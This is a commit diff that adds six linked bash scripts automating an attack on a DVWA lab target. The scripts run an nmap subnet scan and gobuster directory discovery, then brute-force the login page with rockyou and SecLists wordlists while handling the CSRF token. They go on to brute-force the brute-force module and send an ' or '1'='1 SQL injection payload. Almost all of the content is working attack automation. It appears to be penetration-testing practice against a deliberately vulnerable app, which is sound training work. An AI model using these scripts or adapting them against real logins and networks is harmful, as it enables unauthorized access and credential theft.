Add files via upload

bruteForce.sh

@@ -0,0 +1,71 @@
+#vulnId.sh --> bruteForce.sh
+
+echo -e "\n---- Starting Brute Force on brute vulnerability ----"
+sleep 3s
+
+## Variables
+LOGIN_URL=$LOGIN_URL
+BRUTE_DIR=$BRUTE_DIR
+#USER and PASS found from bruteLogin.sh
+DVWA_USER=$DVWA_USER
+DVWA_PASS=$DVWA_PASS
+
+#DVWA_USER='admin'
+#DVWA_PASS='password'
+
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt"
+
+## Value to look for in response in webpage source code
+SUCCESS="Welcome to the password protected area $DVWA_USER"
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+  ## Username loop
+  while read -r _USER; do
+
+    ## Increase counter
+    ((i=i+1))
+
+    ## Display USER:PASS attempts to user
+    #echo "Try ${i}: ${_USER} : ${_PASS}"
+
+    ## Connect to web server 
+    REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )"
+    [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+    ## Check response against SUCCESS string
+    echo "${REQUEST}" | grep -q "${SUCCESS}"
+    if [[ "$?" -eq 0 ]]; then
+      ## Success!
+      echo -e "\nFound at Try: ${i}"
+      echo "Username: ${_USER}"
+      echo "Password: ${_PASS}"
+
+      #echo "${REQUEST}"
+      echo "$SUCCESS"
+      sleep 3s
+      break 2
+    fi
+
+  done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+#rm -f /tmp/dvwa.cookie
+
+export COUNT=2
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh

bruteLogin.sh

@@ -0,0 +1,60 @@
+#scanInit.sh --> bruteLogin.sh
+
+echo -e " \n---- Starting Brute force on Login Page ---- "
+
+## Variables
+export LOGIN_URL=$LOGIN_URL
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/rockyou.txt"
+export IP=$INIT_IP
+
+## Value to look for in response
+SUCCESS="Location: index.php"
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+  ## Username loop
+  while read -r _USER; do
+
+    ## Increase counter
+    ((i=i+1))
+
+    ## Display USER:PASS attempts to user
+    ## Comment out for less noise
+    #echo "Try ${i}: ${_USER} : ${_PASS}"
+
+    ## Connect to web server
+    CSRF=$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie $LOGIN_URL | awk -F 'value=' '/user_token/ {print $2}' | awk -F "'" '{print $2}' )
+
+    REQUEST="$( curl -sib ~/Documents/DVWA/scripts/dvwa.cookie --data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login" $LOGIN_URL )"
+    [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+    ## Check response against SUCCESS string       
+    echo "${REQUEST}" | grep -q "${SUCCESS}"
+    if [[ "$?" -eq 0 ]]; then
+      ## Success!
+      echo -e "\nFound at Try ${i}:\nUsername:${_USER}\nPassword:${_PASS}"
+      sleep 3s
+
+      #export credential variables to use in next script
+      export USER="$(echo "${_USER}")"
+      export PASS="$(echo "${_PASS}")"   
+
+      break 2
+    fi
+
+  done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+rm -f ~/Documents/DVWA/scripts/dvwa.cookie
+
+#Create counter for next script
+export COUNT=1
+
+#Call next script
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh

init.sh

@@ -0,0 +1,18 @@
+##init.sh
+
+##Force no internet
+#nmcli networking off
+
+##Check for internet connection
+wget -q --spider http://google.com
+if [ $? -eq 0 ]; then
+    echo "Online"
+    echo -e "---- Starting Network scans ---- \n "
+    /bin/bash ~/Documents/DVWA/scripts/scanInit.sh
+else
+    echo "No network connection"
+    echo "quitting"
+    exit
+fi
+
+

scanInit.sh

@@ -0,0 +1,33 @@
+#init.sh --> scanInit.sh
+
+##Variables
+##export local IP
+#export INIT_IP=$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
+
+#Get all IP's and HTTP ports on network
+nmap -T4 -Pn 192.168.40.141/24 | grep -E 'http|([0-9]{1,3}[\.]){3}[0-9]{1,3}' | grep -v https > tmp.txt
+
+#Get HTTP ip address
+export INIT_IP=$(cat tmp.txt | grep 'http' -B 1 | grep -Eo '([0-9]{1,3}[\.]){3}[0-9]{1,3}')
+#Get HTTP port
+HTTP_PORT=$(cat tmp.txt | grep http | sed 's/[^0-9]*//g')
+
+#rm tmp.txt
+
+#HTTP_PORT=80
+
+echo "IP address: $INIT_IP"
+echo "HTTP port number: $HTTP_PORT"
+export WORD_LIST="/usr/share/dirb/wordlists/common.txt" 
+
+#Create variable for the Login URL using the IP and open port number
+export LOGIN_URL=$(gobuster dir -u "$INIT_IP:$HTTP_PORT/DVWA/" -nqelw $WORD_LIST -x php | grep login | grep -o '^\S*')
+
+echo "Full Login URL: $LOGIN_URL"
+
+sleep 3s
+
+#Call next script (Brute Forcing the login page)
+/bin/bash ~/Documents/DVWA/scripts/bruteLogin.sh
+
+

sqli.sh

@@ -0,0 +1,43 @@
+#vulnId.sh --> sqli.sh
+
+#Variables
+#URL=$URL
+IP=$IP
+SQLI_DIR=$SQLI_DIR'/'
+SQLI_1=' or '1'='1
+EXT='?id=1&Submit=Submit'
+LOGIN_URL="http://192.168.40.145/DVWA/login.php/"
+DVWA_USER=$USER
+DVWA_PASS=$PASS
+
+#sqlmap -u "${SQLI_DIR}?id=&Submit=Submit" --cookie="PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj;security=low" --batch --drop-set-cookie
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Connect to server using cookie
+    REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}" )"
+    [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'    
+
+#Display Success        
+echo "${REQUEST}" | grep "Vulnerability: SQL Injection" | sed -e 's/^[ \t]*//'
+
+#Attempt SQLi with DVWA'or'1'='1 
+echo -e "\n---- Attempting SQLi using DVWA'or'1'='1 ----\n"
+TEST1="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?id=DVWA'or'1'='1&Submit=Submit" )"
+    [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Format output
+echo "${TEST1}" | grep -o -P '(?<=pre).*(?=pre)' | sed -e 's/<br /\\\n/g' -e 's/pre><pre>/\\\n/g' -e 's/\\/ /g' -e 's/[/>]//g' -e 's/<//g'
+
+export COUNT=3
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
+
+#Clean up
+#rm -r /root/.sqlmap/output/$IP

vulnId.sh

@@ -0,0 +1,37 @@
+#bruteLogin.sh --> vulnId.sh
+#bruteForce.sh --> vulnId.sh
+
+##Variables
+#export URL="http://192.168.40.145/DVWA/vulnerabilities"
+WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+EXT="/DVWA/vulnerabilities"
+COUNT=$COUNT
+#export COUNT=$COUNT
+export DVWA_USER=$USER
+export DVWA_PASS=$PASS
+export LOGIN_URL=$LOGIN_URL
+export IP=$IP
+
+case $COUNT in 
+	1)	
+        #dirb on DVWA home page to find brute vulnerability directory
+        echo -e "\n---- Finding brute force directory ----\n"        
+	export BRUTE_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/brute ' | grep -o '^\S*')        
+	echo -e "Directory with brute vulnerability: $BRUTE_DIR"
+        sleep 5s
+        /bin/bash ~/Documents/DVWA/scripts/bruteForce.sh
+        ;;
+        2)
+	#find sqli vulnerability directory
+        echo -e "\n---- Finding SQL injection directory ----\n"        
+	export SQLI_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/sqli ' | grep -o '^\S*')
+        echo -e "Directory with sqli vulnerability: $SQLI_DIR \n"
+        sleep 5s
+        /bin/bash ~/Documents/DVWA/scripts/sqli.sh
+        ;; 
+        3) 
+        rm tmp.txt
+	rm dvwa.cookie
+	;;
+        *)
+esac